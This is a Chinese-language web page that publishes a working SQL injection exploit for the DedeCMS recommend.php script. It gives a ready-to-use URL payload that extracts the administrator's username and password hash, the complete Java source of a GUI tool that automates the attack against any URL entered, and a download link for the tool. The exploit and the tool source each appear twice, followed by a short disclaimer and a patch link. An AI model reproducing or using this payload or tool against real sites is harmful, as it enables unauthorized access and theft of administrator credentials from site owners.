DedeCMS全版本通殺SQL注入漏洞利用代碼及工具2014年2月28日
發(fā)布時間:2014-02-28 20:51:35 作者:佚名
我要評論

近日,網(wǎng)友在dedecms中發(fā)現(xiàn)了全版本通殺的SQL注入漏洞,目前官方最新版已修復(fù)該漏洞,大家早點去官方下載補(bǔ)丁2014年2月28日
dedecms即織夢(PHP開源網(wǎng)站內(nèi)容管理系統(tǒng))??棄魞?nèi)容管理系統(tǒng)(DedeCms) 以簡單、實用、開源而聞名,是國內(nèi)最知名的PHP開源網(wǎng)站管理系統(tǒng),也是使用用戶最多的PHP類CMS系統(tǒng)。
近日,網(wǎng)友在dedecms中發(fā)現(xiàn)了全版本通殺的SQL注入漏洞,目前官方最新版已修復(fù)該漏洞,相關(guān)利用代碼如下:
EXP:
http://*.*.com/plus/recommend.php?action=&aid=1&_FILES[type][tmp_name]=\' or mid=@`\'` /*!50000union*//*!50000select*/1,2,3,(select CONCAT(0x7c,userid,0x7c,pwd)+from+`%23@__admin` limit+0,1),5,6,7,8,9%23@`\'`+&_FILES[type][name]=1.jpg&_FILES[type][type]=application/octet-stream&_FILES[type][size]=111
直接獲取就可以得到管理員的用戶名與加密后的密碼,效果如下圖所示
利用工具源碼(by 園長):
package org.javaweb.dede.ui;
import java.awt.Toolkit;
import java.io.BufferedReader;
import java.io.InputStreamReader;
import java.net.URL;
import java.util.regex.Matcher;
import java.util.regex.Pattern;
/**
*
* @author yz
*/
public class MainFrame extends javax.swing.JFrame {
private static final long serialVersionUID = 1L;
/**
* Creates new form MainFrame
*/
public MainFrame() {
initComponents();
}
public String request(String url){
String str = "",tmp;
try {
BufferedReader br = new BufferedReader(new InputStreamReader(new URL(url).openStream()));
while((tmp=br.readLine())!=null){
str+=tmp+"\r\n";
}
} catch (Exception e) {
jTextArea1.setText(e.toString());
}
return str;
}
private void initComponents() {
jPanel1 = new javax.swing.JPanel();
jLabel1 = new javax.swing.JLabel();
jTextField1 = new javax.swing.JTextField();
jButton1 = new javax.swing.JButton();
jScrollPane1 = new javax.swing.JScrollPane();
jTextArea1 = new javax.swing.JTextArea();
setDefaultCloseOperation(javax.swing.WindowConstants.EXIT_ON_CLOSE);
jLabel1.setText("URL:");
jTextField1.setText("<a href="http://localhost">http://localhost</a>");
this.setTitle("DedeCms recommend.php注入利用工具-p2j.cn");
int screenWidth = Toolkit.getDefaultToolkit().getScreenSize().width;
int screenHeight = Toolkit.getDefaultToolkit().getScreenSize().height;
this.setBounds(screenWidth / 2 - 229, screenHeight / 2 - 158, 458, 316);
jButton1.setText("獲取");
jButton1.addActionListener(new java.awt.event.ActionListener() {
public void actionPerformed(java.awt.event.ActionEvent evt) {
jButton1ActionPerformed(evt);
}
});
jTextArea1.setColumns(20);
jTextArea1.setRows(5);
jScrollPane1.setViewportView(jTextArea1);
javax.swing.GroupLayout jPanel1Layout = new javax.swing.GroupLayout(jPanel1);
jPanel1.setLayout(jPanel1Layout);
jPanel1Layout.setHorizontalGroup(
jPanel1Layout.createParallelGroup(javax.swing.GroupLayout.Alignment.LEADING)
.addGroup(jPanel1Layout.createSequentialGroup()
.addGroup(jPanel1Layout.createParallelGroup(javax.swing.GroupLayout.Alignment.TRAILING, false)
.addComponent(jScrollPane1, javax.swing.GroupLayout.Alignment.LEADING)
.addGroup(javax.swing.GroupLayout.Alignment.LEADING, jPanel1Layout.createSequentialGroup()
.addContainerGap()
.addComponent(jLabel1)
.addPreferredGap(javax.swing.LayoutStyle.ComponentPlacement.RELATED)
.addComponent(jTextField1, javax.swing.GroupLayout.PREFERRED_SIZE, 331, javax.swing.GroupLayout.PREFERRED_SIZE)
.addPreferredGap(javax.swing.LayoutStyle.ComponentPlacement.RELATED)
.addComponent(jButton1, javax.swing.GroupLayout.PREFERRED_SIZE, 83, javax.swing.GroupLayout.PREFERRED_SIZE)))
.addGap(0, 0, Short.MAX_VALUE))
);
jPanel1Layout.setVerticalGroup(
jPanel1Layout.createParallelGroup(javax.swing.GroupLayout.Alignment.LEADING)
.addGroup(jPanel1Layout.createSequentialGroup()
.addContainerGap()
.addGroup(jPanel1Layout.createParallelGroup(javax.swing.GroupLayout.Alignment.BASELINE)
.addComponent(jLabel1)
.addComponent(jTextField1,
javax.swing.GroupLayout.PREFERRED_SIZE,
javax.swing.GroupLayout.DEFAULT_SIZE,
javax.swing.GroupLayout.PREFERRED_SIZE)
.addComponent(jButton1))
.addPreferredGap(javax.swing.LayoutStyle.ComponentPlacement.RELATED)
.addComponent(jScrollPane1, javax.swing.GroupLayout.DEFAULT_SIZE, 254, Short.MAX_VALUE))
);
javax.swing.GroupLayout layout = new javax.swing.GroupLayout(getContentPane());
getContentPane().setLayout(layout);
layout.setHorizontalGroup(
layout.createParallelGroup(javax.swing.GroupLayout.Alignment.LEADING)
.addComponent(jPanel1, javax.swing.GroupLayout.DEFAULT_SIZE, javax.swing.GroupLayout.DEFAULT_SIZE, Short.MAX_VALUE)
);
layout.setVerticalGroup(
layout.createParallelGroup(javax.swing.GroupLayout.Alignment.LEADING)
.addComponent(jPanel1, javax.swing.GroupLayout.DEFAULT_SIZE, javax.swing.GroupLayout.DEFAULT_SIZE, Short.MAX_VALUE)
);
pack();
}// </editor-fold>
private void jButton1ActionPerformed(java.awt.event.ActionEvent evt) {
String url = jTextField1.getText();
if(null==url||"".equals(url)){
return ;
}
String result = request(url+"/plus/recommend.php?action=&aid=1&_FILES[type][tmp_name]=\\%27%20or%20mid=@`\\%27`%20/*!50000union*//*!50000select*/1,2,3,(select%20CONCAT(0x7c,userid,0x7c,pwd)+from+`%23@__admin`%20limit+0,1),5,6,7,8,9%23@`\\%27`+&_FILES[type][name]=1.jpg&_FILES[type][type]=application/octet-stream&_FILES[type][size]=4294");
Matcher m = Pattern.compile("<h2>(.*)</h2>").matcher(result);
if(m.find()){
String[] s = m.group(1).split("\\|");
if(s.length>2){
jTextArea1.setText("UserName:"+s[1]+"\r\nMD5:"+s[2].substring(3,s[2].length()-1));
}
}
}
public static void main(String args[]) {
java.awt.EventQueue.invokeLater(new Runnable() {
public void run() {
new MainFrame().setVisible(true);
}
});
}
// Variables declaration - do not modify
private javax.swing.JButton jButton1;
private javax.swing.JLabel jLabel1;
private javax.swing.JPanel jPanel1;
private javax.swing.JScrollPane jScrollPane1;
private javax.swing.JTextArea jTextArea1;
private javax.swing.JTextField jTextField1;
// End of variables declaration
}
利用工具下載地址 http://pan.baidu.com/s/1i37LUnF (本站提供程序(方法)可能帶有攻擊性,僅供安全研究與教學(xué)之用,風(fēng)險自負(fù)!)

dedecms官方補(bǔ)丁地址: http://www.dedecms.com/pl/
近日,網(wǎng)友在dedecms中發(fā)現(xiàn)了全版本通殺的SQL注入漏洞,目前官方最新版已修復(fù)該漏洞,相關(guān)利用代碼如下:
EXP:
復(fù)制代碼
代碼如下:http://*.*.com/plus/recommend.php?action=&aid=1&_FILES[type][tmp_name]=\' or mid=@`\'` /*!50000union*//*!50000select*/1,2,3,(select CONCAT(0x7c,userid,0x7c,pwd)+from+`%23@__admin` limit+0,1),5,6,7,8,9%23@`\'`+&_FILES[type][name]=1.jpg&_FILES[type][type]=application/octet-stream&_FILES[type][size]=111
直接獲取就可以得到管理員的用戶名與加密后的密碼,效果如下圖所示
利用工具源碼(by 園長):
復(fù)制代碼
代碼如下:package org.javaweb.dede.ui;
import java.awt.Toolkit;
import java.io.BufferedReader;
import java.io.InputStreamReader;
import java.net.URL;
import java.util.regex.Matcher;
import java.util.regex.Pattern;
/**
*
* @author yz
*/
public class MainFrame extends javax.swing.JFrame {
private static final long serialVersionUID = 1L;
/**
* Creates new form MainFrame
*/
public MainFrame() {
initComponents();
}
public String request(String url){
String str = "",tmp;
try {
BufferedReader br = new BufferedReader(new InputStreamReader(new URL(url).openStream()));
while((tmp=br.readLine())!=null){
str+=tmp+"\r\n";
}
} catch (Exception e) {
jTextArea1.setText(e.toString());
}
return str;
}
private void initComponents() {
jPanel1 = new javax.swing.JPanel();
jLabel1 = new javax.swing.JLabel();
jTextField1 = new javax.swing.JTextField();
jButton1 = new javax.swing.JButton();
jScrollPane1 = new javax.swing.JScrollPane();
jTextArea1 = new javax.swing.JTextArea();
setDefaultCloseOperation(javax.swing.WindowConstants.EXIT_ON_CLOSE);
jLabel1.setText("URL:");
jTextField1.setText("<a href="http://localhost">http://localhost</a>");
this.setTitle("DedeCms recommend.php注入利用工具-p2j.cn");
int screenWidth = Toolkit.getDefaultToolkit().getScreenSize().width;
int screenHeight = Toolkit.getDefaultToolkit().getScreenSize().height;
this.setBounds(screenWidth / 2 - 229, screenHeight / 2 - 158, 458, 316);
jButton1.setText("獲取");
jButton1.addActionListener(new java.awt.event.ActionListener() {
public void actionPerformed(java.awt.event.ActionEvent evt) {
jButton1ActionPerformed(evt);
}
});
jTextArea1.setColumns(20);
jTextArea1.setRows(5);
jScrollPane1.setViewportView(jTextArea1);
javax.swing.GroupLayout jPanel1Layout = new javax.swing.GroupLayout(jPanel1);
jPanel1.setLayout(jPanel1Layout);
jPanel1Layout.setHorizontalGroup(
jPanel1Layout.createParallelGroup(javax.swing.GroupLayout.Alignment.LEADING)
.addGroup(jPanel1Layout.createSequentialGroup()
.addGroup(jPanel1Layout.createParallelGroup(javax.swing.GroupLayout.Alignment.TRAILING, false)
.addComponent(jScrollPane1, javax.swing.GroupLayout.Alignment.LEADING)
.addGroup(javax.swing.GroupLayout.Alignment.LEADING, jPanel1Layout.createSequentialGroup()
.addContainerGap()
.addComponent(jLabel1)
.addPreferredGap(javax.swing.LayoutStyle.ComponentPlacement.RELATED)
.addComponent(jTextField1, javax.swing.GroupLayout.PREFERRED_SIZE, 331, javax.swing.GroupLayout.PREFERRED_SIZE)
.addPreferredGap(javax.swing.LayoutStyle.ComponentPlacement.RELATED)
.addComponent(jButton1, javax.swing.GroupLayout.PREFERRED_SIZE, 83, javax.swing.GroupLayout.PREFERRED_SIZE)))
.addGap(0, 0, Short.MAX_VALUE))
);
jPanel1Layout.setVerticalGroup(
jPanel1Layout.createParallelGroup(javax.swing.GroupLayout.Alignment.LEADING)
.addGroup(jPanel1Layout.createSequentialGroup()
.addContainerGap()
.addGroup(jPanel1Layout.createParallelGroup(javax.swing.GroupLayout.Alignment.BASELINE)
.addComponent(jLabel1)
.addComponent(jTextField1,
javax.swing.GroupLayout.PREFERRED_SIZE,
javax.swing.GroupLayout.DEFAULT_SIZE,
javax.swing.GroupLayout.PREFERRED_SIZE)
.addComponent(jButton1))
.addPreferredGap(javax.swing.LayoutStyle.ComponentPlacement.RELATED)
.addComponent(jScrollPane1, javax.swing.GroupLayout.DEFAULT_SIZE, 254, Short.MAX_VALUE))
);
javax.swing.GroupLayout layout = new javax.swing.GroupLayout(getContentPane());
getContentPane().setLayout(layout);
layout.setHorizontalGroup(
layout.createParallelGroup(javax.swing.GroupLayout.Alignment.LEADING)
.addComponent(jPanel1, javax.swing.GroupLayout.DEFAULT_SIZE, javax.swing.GroupLayout.DEFAULT_SIZE, Short.MAX_VALUE)
);
layout.setVerticalGroup(
layout.createParallelGroup(javax.swing.GroupLayout.Alignment.LEADING)
.addComponent(jPanel1, javax.swing.GroupLayout.DEFAULT_SIZE, javax.swing.GroupLayout.DEFAULT_SIZE, Short.MAX_VALUE)
);
pack();
}// </editor-fold>
private void jButton1ActionPerformed(java.awt.event.ActionEvent evt) {
String url = jTextField1.getText();
if(null==url||"".equals(url)){
return ;
}
String result = request(url+"/plus/recommend.php?action=&aid=1&_FILES[type][tmp_name]=\\%27%20or%20mid=@`\\%27`%20/*!50000union*//*!50000select*/1,2,3,(select%20CONCAT(0x7c,userid,0x7c,pwd)+from+`%23@__admin`%20limit+0,1),5,6,7,8,9%23@`\\%27`+&_FILES[type][name]=1.jpg&_FILES[type][type]=application/octet-stream&_FILES[type][size]=4294");
Matcher m = Pattern.compile("<h2>(.*)</h2>").matcher(result);
if(m.find()){
String[] s = m.group(1).split("\\|");
if(s.length>2){
jTextArea1.setText("UserName:"+s[1]+"\r\nMD5:"+s[2].substring(3,s[2].length()-1));
}
}
}
public static void main(String args[]) {
java.awt.EventQueue.invokeLater(new Runnable() {
public void run() {
new MainFrame().setVisible(true);
}
});
}
// Variables declaration - do not modify
private javax.swing.JButton jButton1;
private javax.swing.JLabel jLabel1;
private javax.swing.JPanel jPanel1;
private javax.swing.JScrollPane jScrollPane1;
private javax.swing.JTextArea jTextArea1;
private javax.swing.JTextField jTextField1;
// End of variables declaration
}
利用工具下載地址 http://pan.baidu.com/s/1i37LUnF (本站提供程序(方法)可能帶有攻擊性,僅供安全研究與教學(xué)之用,風(fēng)險自負(fù)!)

dedecms官方補(bǔ)丁地址: http://www.dedecms.com/pl/
相關(guān)文章
路由器、交換機(jī)及防火墻漏洞的發(fā)現(xiàn)與防范方法
在本文中,我們將探討為什么這些設(shè)備容易受到攻擊,現(xiàn)在有多少惡意網(wǎng)絡(luò)攻擊是瞄準(zhǔn)路由器、交換機(jī)和防火墻的以及企業(yè)應(yīng)該采取什么措施來保護(hù)其網(wǎng)絡(luò)2013-12-11- 最近看到網(wǎng)上曝出的dedecms最新版本的一個注入漏洞利用,漏洞PoC和分析文章也已在網(wǎng)上公開.但是在我實際測試過程當(dāng)中,發(fā)現(xiàn)無法復(fù)現(xiàn)2013-06-11
nginx+cgi解析php容易出現(xiàn)的漏洞的分析
本文簡要的分析nginx+cgi解析php容易出現(xiàn)的漏洞2012-10-25- 我們來分析一下163郵箱記事本存儲型Xss漏洞分析與補(bǔ)救措施2012-10-23
- 偶爾在網(wǎng)上看到這些,拿來和大家一塊看看,也好讓各個站長懂得保護(hù)自己的網(wǎng)站2012-10-16
微軟發(fā)布Fix it工具修復(fù)IE7/8/9漏洞 ie用戶請盡快修復(fù)(0day漏洞)
日前有安全機(jī)構(gòu)曝光了IE瀏覽器的一個0day漏洞,利用這個0day漏洞(CVE-2012-4681)攻擊者可以繞過Windows的ASLR(地址空間布局隨機(jī)化)防護(hù)機(jī)制,訪問用戶曾訪問過的計算機(jī)2012-09-20網(wǎng)站的九大敵人有哪些 千萬別給Web應(yīng)用漏洞可趁之機(jī)
過去,網(wǎng)站的內(nèi)容大多是靜態(tài)的。隨著HTML5的流行,Web應(yīng)用進(jìn)入一個嶄新階段,內(nèi)容的動態(tài)化和實時共享讓阻攔不良內(nèi)容或惡意軟件變得更加復(fù)雜,公司和個人的重要信息也被暴于2012-08-23WEBSHELL箱子系統(tǒng)V1.0收信箱子代碼漏洞分析及解決方法
來分析一下WEBSHELL箱子系統(tǒng)的漏洞2012-08-17了解網(wǎng)站的九大敵人 謹(jǐn)防web漏洞威脅
過去,網(wǎng)站的內(nèi)容大多是靜態(tài)的。隨著HTML5的流行,Web應(yīng)用進(jìn)入一個嶄新階段,內(nèi)容的動態(tài)化和實時共享讓阻攔不良內(nèi)容或惡意軟件變得更加復(fù)雜,公司和個人的重要信息也被暴于2012-08-09小米MIUI系統(tǒng)漏洞致大量系統(tǒng)、軟件和用戶數(shù)據(jù)泄露及修復(fù)方法
MIUI的刷機(jī)量很大.出現(xiàn)下面這個漏洞要及時補(bǔ)啊2012-07-30